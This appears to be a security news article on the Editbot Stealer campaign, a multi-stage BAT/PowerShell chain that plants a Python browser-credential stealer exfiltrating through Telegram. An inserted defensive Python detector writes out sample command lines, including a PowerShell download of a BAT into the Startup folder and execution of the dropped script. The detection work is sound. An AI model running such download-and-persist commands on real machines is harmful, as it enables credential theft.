Stealing Browser Passwords & Cookies


A new malicious campaign, Editbot Stealer, has been discovered in which threat actors use WinRAR archive files that attract minimal detection to carry out a multi-stage attack. The threat actors lure users to their deceptive websites with the theme of a “defective product to be sent back”.

The malicious WinRAR archive used by the threat actors contains a .bat file and a JSON file for the initial stage of the attack, followed by PowerShell commands for the later stages. The malicious files were distributed through social media.


Editbot Stealer in Action

Initial Access & Persistence

According to the reports shared with Cyber Security News, the BAT file used in the initial stage of the attack is named “Screenshot Product Photo Sample.bat” and contains multiple PowerShell commands that download and execute additional payloads.

RAR file containing the BAT and JSON files (Source: Cyble)

The first PowerShell command inside the BAT file downloads another BAT file from GitLab and saves it as “WindowsSecure.bat” in the Startup folder so that it runs on every logon. This BAT file is used to regularly execute the Python stealer, which is downloaded later in the attack chain.

The second PowerShell command retrieves a ZIP file named “Document.zip” from the same GitLab repository and saves it in the C:\Users\Public directory. The third PowerShell command extracts this ZIP file into the C:\Users\Public\Documents directory, which then contains the Python stealer “libb1.py”.
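As an added defender-side example (not code from the article or the Cyble report), the following Python runs a few constructed process-creation records through checks for the delivery stages just described: PowerShell launched from a BAT file fetching from GitLab, a BAT dropped into the Startup folder, a ZIP unpacked under C:\Users\Public, and a Python interpreter started on the dropped script. The cmdlet names, host names, user name and GitLab path are assumptions.

```python
import re

# Each rule: (name, regex over the command line, optional regex over the parent image).
# Cmdlet names and paths below are assumptions modelled on the article's description.
RULES = [
    ("powershell_from_bat_gitlab", re.compile(r"powershell.*gitlab\.com", re.I), r"cmd\.exe$"),
    ("bat_dropped_in_startup", re.compile(r"\\Startup\\.*\.bat", re.I), None),
    ("zip_unpacked_to_public", re.compile(r"Expand-Archive.*C:\\Users\\Public", re.I), None),
    ("python_run_from_public", re.compile(r"python.*C:\\Users\\Public\\Documents\\.*\.py", re.I), None),
]

def match_rules(event):
    """Return the names of the rules that fire on one process-creation record."""
    hits = []
    for name, cmd_re, parent_re in RULES:
        if not cmd_re.search(event.get("CommandLine", "")):
            continue
        if parent_re and not re.search(parent_re, event.get("ParentImage", ""), re.I):
            continue
        hits.append(name)
    return hits

def score_hosts(events):
    """Group hits per host; two or more distinct stages seen on one host are
    flagged as a probable Editbot-style delivery chain."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["Host"], set()).update(match_rules(ev))
    return {host: (sorted(hits), len(hits) >= 2) for host, hits in per_host.items()}

# Constructed sample telemetry (not real captures); the GitLab path is a placeholder.
STARTUP = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    {"Host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -c Invoke-WebRequest https://gitlab.com/PLACEHOLDER/WindowsSecure.bat"
                    r" -OutFile " + STARTUP + r"\WindowsSecure.bat"},
    {"Host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -c Expand-Archive C:\Users\Public\Document.zip C:\Users\Public\Documents"},
    {"Host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python C:\Users\Public\Documents\libb1.py"},
    # Benign admin activity on another host: no stage should fire.
    {"Host": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -c Get-ChildItem C:\Users\Public"},
]

if __name__ == "__main__":
    for host, (stages, flagged) in score_hosts(SAMPLE_EVENTS).items():
        print(host, "FLAGGED" if flagged else "clean", stages)
```

Requiring two distinct stages on the same host keeps a lone Expand-Archive or a single download from GitLab from paging anyone, while the full chain seen here trips on all four.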

Working of the Python Stealer – Editbot

The Python stealer's code performs several functions: it records the victim's country code, IP address and a timestamp, and it steals credentials from several browsers.

The stealer copies several artifacts, namely cookies, login data, web data and the local state file, from the browser profile folder into the %temp% folder. All of the stolen information is then written to a text file named “pass.txt”.

After collecting all the information from the victim, the stealer creates a ZIP archive of the extracted data and stores it in the same %temp% directory. To exfiltrate this information, the threat actors have set up Telegram bots.

A complete report about the Editbot stealer has also been published, providing detailed information on the source code, the extraction method and further findings.

Indicators of Compromise



